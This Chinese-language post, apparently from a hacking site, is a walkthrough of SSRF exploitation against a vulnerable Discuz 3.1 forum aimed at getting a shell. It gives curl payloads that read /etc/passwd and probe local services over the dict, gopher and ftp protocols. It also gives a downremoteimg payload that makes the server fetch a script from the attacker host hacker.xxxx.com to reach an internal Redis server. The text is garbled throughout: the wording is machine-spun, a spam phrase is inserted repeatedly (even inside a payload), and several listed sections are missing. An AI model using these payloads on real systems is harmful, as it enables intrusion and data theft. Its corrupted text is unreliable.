简易的黑客编码-SSRF漏洞利用与getshell实战演练
什么叫SSRF?
SSRF(Server-Side Request Forgery,服务器端要求仿冒)是一种由 *** 攻击结构要求,利用服务器端进行的安全性漏洞。一般状况下,SSRF进攻的总体目标是外网地址无法打开的內部系统软件(正由于要求是由服务器端进行的,因此 *** 服务器能要求到与本身相接到外网防护的內部系统软件)。
Example:
GET /index.php?url=http://google.com/ HTTP/1.1
Host: example.com
在黑客cmd命令全集这儿,http://example.com从它的 *** 服务器获得http://google.com
文件目录
0X00 SSRF的种类
0X01 哪些地方最非常容易出現SSRF
0X02 SSRF漏洞的伤害
0X03 黑客cmd命令全集 SSRF武器Curl的应用
0X04 最常见的自动跳转绕开
0X05 Python SSRF完成端口扫描器
0X06 利用Discuz的SSRF漏洞GetShell
0X07 简易的绕开SSRF图片的限定
0X08 很有可能碰到的难题
0X09 常见发掘SSRF漏洞的专用工具
0X00 SSRF的种类
1. 显示信息 *** 攻击的回应(Basic)
2. 无法显示回应(Blind)
0X01 哪些地方最非常容易出現SSRF
云主机商。(各种各样网黑客cmd命令全集站数据库操作)
有远程控制图片载入的地区。(在线编辑器这类的有远程控制图片载入啊)
网址收集、网页页面爬取的地区。(许多 网址会出现新闻报道收集键入url随后一键收集)
头像图片的地区。(某易就爱远程控制载入头像图片,比如:https://www.xxxx.com/image?url=http://www.image.com/1.jpg)
最后一个一切想要你输入网址的地区和能够键入ip的都放,全是ssrf的天地。
0X02 SSRF漏洞的伤害
对 *** 服务器所属的内部网开展端口扫描器,获得一些服务项目的banner信息内容等
进攻运黑客cmd命令大全行以内网或是当地的应用软件
对里网WEB运用开展指纹验证,根据浏览默认设置文档完成(Readme等文档)
进攻內外网的WEB运用,主要是GET就可以完成的进攻(例如Struts2,SQL引入等)
免费下载内网资源(利用file协议书载入本地文件等)
利用Redis未受权浏览,HTTP CRLF引入做到getshell
wooyun高峰会猪猪侠的ppt
开展起点、跳板
忽视cdn
0X03 SSRF武器Curl的应用
查询curl适用的协议书目录 #curl--config 黑客cmd命令全集 –protocols
应用curl读取文件
curl -v file:///etc/passwd
应用ftp协议书
curl -v "ftp://127.0.0.1:6666/info"
应用dict协议书
curl -v "dict://127.0.0.1:6666/info"
应用gopher协议书
curl -v "gopher://127.0.0.1:6666/_info"
0X04最常见的自动跳转绕开
0X05 Python SSRF完成端口扫描器
简易的端口扫描器
另外观查Wireshark全部扫描仪步骤
编码完成:
认证当地是不是打开了相对的端口号
Python编码撰写的构思:
端口号存有联接会一直在联接,连接时间会较长。
端口号不会有的联接会被立刻更新
0X06 利用Discuz的SSRF漏洞GetShell
Discuz没有理由限定ssrf漏洞(<=3.1检测是有这一漏洞)
试验自然环境:
172.28.100.109 为Discuz 黑客cmd命令全集 3.1(Win10),172.28.100.108为Redis *** 服务器(CentOS),hacker.xxxx.com为外网地址检测 *** 服务器关键储放ssrf用的php文件
Discuz3.1下载链接:
http://www.comsenz.com/downloads/install/discuzx#down_open
实例:
/forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=dict&ip=172.28.100.108&port=6666&data=hello.jpg[/img]
具体应用payload:
http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=ftp&ip=172.28.100.108&port=66黑客cmd命令全集66&data=he2lo.jpg[/img]
利用nc来检测SSRF漏洞
http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]
tcpdump抓包软件见到Discuz发过来的数据文件
nc也是有反映了
基础能够确定这儿是有SSRF漏洞
应用header 来相互配合ssrf漏洞利用,在我外网地址 *** 服务器放了一个ssrf.php
相关文章
怎样在qq上找黑客-s2-029Struts2标签远程控制代码执行剖析标签详细介绍Struts2标签库提供了主题、模板适用,巨大地简单化了主视图页面的撰写,并且,struts2的主题、模板都提供了非常好的扩展性。完成了更强的编码多路复用。Struts2容许在页面中应用自定部件,这彻底...
黑客知识网 116 2020-11-11
简易的黑客编码-SSRF漏洞利用与getshell实战演练什么叫SSRF?SSRF(Server-SideRequestForgery,服务器端要求仿冒)是一种由 *** 攻击结构要求,利用服务器端进行的安全性漏洞。一般状况下,SSRF进攻的总体目标是外网地址无法打开的內部系统软件(正由于要求是由服务器端进行的,因此 *** 服务器能要求到与本身相接到外网防护的內部系统软件)。Example:GET/...
黑客知识网 55 2020-11-11
留言评论
| 留言与评论(共有 0 条评论) |
|
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
